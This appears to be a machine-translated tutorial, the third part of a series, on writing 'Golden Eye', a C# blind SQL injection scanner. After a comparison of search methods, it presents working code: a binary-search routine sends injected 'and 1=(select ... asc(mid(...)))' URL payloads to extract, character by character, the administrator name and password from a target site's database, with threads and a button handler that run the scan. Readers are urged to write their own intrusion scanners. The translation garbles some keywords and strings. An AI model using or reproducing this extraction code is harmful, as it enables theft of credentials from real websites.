Golden Eye-creation of SQL Injection scanner (3)

Golden Eye-creation of SQL Injection scanner (3)

(Author: mikespook | Release Date: | views: 72)

Keywords: Golden Eye, SQL injection, scanner, C #

"Half-lookup" is the search method I used in "Golden Eye" 1.2 and 1.3. The speed is already very fast. The number of comparisons is the main metric for finding out the advantages and disadvantages of an algorithm. We hope to find what we need with the least number of comparisons. Below I will give you three formulas to quantitatively compare the speed of the three search methods. You do not need to investigate the source of the formula. Interested readers can refer to the data structure published by Tsinghua University. "Sequential search": ASL = (n + 1)/2 when n = 20 ASL = 11 "Index search": ASL = log2 (N/S + 1) + S/2 when n = 20, S = 6 ASL = 9 "Half-lookup": ASL = log2 (n + 1)-1 when n = 20 ASL = 4 The result is an approximate value. N indicates the total number of elements in the query table. S is the number of elements contained in an index segment. Asl indicates the average number of searches. Of course, the smaller the value, the faster the search. From the above data, we can see that "half-lookup" is highly efficient. In fact, the larger the number of N, the more obvious the search speed. I have calculated that when there are 65535 elements, the "sequential search" takes an average of 32768 times. On average, the "half-fold search" takes only 15 times to complete the search. Now, I have introduced three methods for finding the length of a field. Let's take a look at the implementation of the field content. Still use "half-lookup" Private char getfield (string table, string field, int index, int L, int H) { Int nchar = 0; Int low = L; Int hig = h; Int mid; // Avoid endless loops and set the maximum number of searches Int TMP = H-l; While (low <= HIG) & (TMP! = 0 )) { // Calculate the midpoint Value Mid = (low + HIG)/2; // Determine whether the field value is smaller than the midpoint Value If (this. getpage (strpage + "% 20and % 201 = (select % 20id % 20 from % 20" + Table + "% 20 where % 20asc (mid (" + field + ", "+ index. tostring () + ", 1) <" + mid. tostring () + ")")) // Narrow the scan Scope Hig = mid-1; Else // Determine whether the field value is greater than the midpoint Value If (this. getpage (strpage + "% 20and % 201 = (select % 20id % 20 from % 20" + Table + "% 20 where % 20asc (mid (" + field + ", "+ index. tostring () + ", 1)>" + mid. tostring () + ")")) // Narrow the scan Scope Low = Mid + 1; Else // Determine whether the field value is equal to the midpoint Value If (this. getpage (strpage + "% 20and % 201 = (select % 20id % 20 from % 20" + Table + "% 20 where % 20asc (mid (" + field + ", "+ index. tostring () + ", 1) =" + mid. tostring () + ")")) { // Search successful Nchar = mid; // Exit the loop Break; } // The maximum number of searches minus 1 -- TMP; } // Return the searched result. If it is 0, the search fails. Return (char) nchar; } The function is similar to the function used to obtain the field length. Let's take a look at the annotations. With the function of getting the field length and getting the field value characters, we can start to write the real scan code. Call these functions to complete the required functions. Here, I use multiple threads to complete the process. Because the thread call function cannot use parameters to pass values, the following global fields must be added to the form class to pass parameters to the scan thread function: Private bool bnameover; // this parameter is set to false when the thread with the Administrator name is scanned, and true when the thread with the Administrator name is scanned. Private bool bpassover; // set false when the thread scanning the password starts and true when it ends Private string strpage; // scan the target page The following is a thread function that scans the Administrator name: Public void getname () { Int nnamelen; Txtlog. Text + = "query the length of the Administrator name.../u000d/u000a "; // Call getfieldlen to obtain the length of the Administrator name Nnamelen = This. getfieldlen ("password", "name", 1, 20 ); Txtlog. Text + = "Administrator Name Length:" + nnamelen. tostring () + "/u000d/u000a "; // When the Administrator name length is not 0 If (! Nnamelen. Equals (0 )) { Txtlog. Text + = "query Administrator name.../u000d/u000a "; // The number of execution cycles is the length of the Administrator name to find the Administrator name For (Int J = 1; j <= nnamelen; ++ J) { Txtlog. Text + = "query Administrator name" + J. tostring () + "characters.../u000d/u000a "; // Call the getfield function to obtain the I-th character of the Administrator name. The character search range is ASCII code 33-126. Char CTMP = This. getfield ("password", "name", J, 33,126 ); // If the getfield function returns 0, the query fails. If (! CTMP. Equals ('/u0000 ')) Txtname. Text + = CTMP; Else { Txtlog. Text + = "An error occurred while querying the Administrator name! /U000d/u000a "; Break; } } Txtlog. Text + = "The Administrator name query is complete! /U000d/u000a "; } Else { Txtlog. Text + = "the available Administrator name cannot be found! /U000d/u000a "; } // Check whether the password has been scanned If (bpassover) { // After scanning the password, disable the btnok. Btnok. Enabled = true; } // Set bnameover, indicating that the Administrator name has been scanned Bnameover = true; } Thread functions with the same password scan: Public void getpass () { Int nnamelen; Txtlog. Text + = "query password length.../u000d/u000a "; // Call getfieldlen to obtain the password length Nnamelen = This. getfieldlen ("password", "name", 1, 50 ); Txtlog. Text + = "password length:" + nnamelen. tostring () + "/u000d/u000a "; // When the password length is not 0 If (! Nnamelen. Equals (0 )) { Txtlog. Text + = "query password.../u000d/u000a "; // The number of execution cycles is the length of the password to find the password For (Int J = 1; j <= nnamelen; ++ J) { Txtlog. Text + = "query password no." + J. tostring () + "characters.../u000d/u000a "; // Call the getfield function to obtain the I-th character of the password. The character search range is ASCII code 33-126. Char CTMP = This. getfield ("password", "PWD", J, 33,126 ); // If the getfield function returns 0, the query fails. If (! CTMP. Equals ('/u0000 ')) Txtpass. Text + = CTMP; Else { Txtlog. Text + = "the password query error! /U000d/u000a "; Break; } } Txtlog. Text + = "password query completed! /U000d/u000a "; } Else { Txtlog. Text + = "no available password can be found! /U000d/u000a "; } // Check whether the Administrator name has been scanned If (bnameover) { // The Administrator name is scanned and the btnok is disabled. Btnok. Enabled = true; } Bpassover = true; } Now everything is available. You only need to create a thread and start scanning. Add the following code to the Click Event of the button btnok: Private void btnok_click (Object sender, system. eventargs E) { // Clear the scan log text box, Administrator name text box, And Password text box Txtlog. Clear (); Txtname. Clear (); Txtpass. Clear (); // Pass the address of the target page to the global variable strpage used by the thread. Strpage = txtpage. text; // To prevent output conflicts caused by multiple clicks of the btnok button, disable the button. Btnok. Enabled = false; // Create a thread Threadstart tsname = new threadstart (getname ); Thread tname = new thread (tsname ); Threadstart tspass = new threadstart (getpass ); Thread tpass = new thread (tspass ); // Set the scan ID Bnameover = false; Bpassover = false; // Start the thread and start scanning Tname. Start (); Tpass. Start (); } All the core code of "Golden Eye" is here. In addition, this program cannot find content whose field value is Chinese. So how to find Chinese content? The following message is displayed: Chinese is double byte. Midb and ASCB are two-byte processing functions. For example, ASCB ("hacker", 3, 1) returns the ASCII code "162" of the first half of the word "customer ". ASCB (midb ("hacker", 4, 1) returns the second half of the "customer" ASCII code "91 ". Of course, there is also the dual-byte function lenb used to test the length. When you use Len to test the two Chinese characters "hacker", the length is 2. However, the length of the string obtained by using lenb ("hacker") is 4. The problem is much simpler. Of course, the scanning range is no longer 33-126. It will be expanded to 0-255. Do you have a general understanding of the process of simulating boring guesses with programs? I hope you can understand how I use different search methods to speed up searching in several versions of continuous upgrade. This is the purpose of this Article. I hope everyone can understand the idea of simulating program intrusion and write their own scanners. In the end, I would like to mention that I am not a person without maintenance. Patches for the scanner and the "jinmei" system are downloaded on my site. If you are using the "jinmei" system, you 'd better patch it! If you have any questions about any content in the text, you can also leave a message on the message board: http://www.xxiyy.com. Have a good time! (^_^)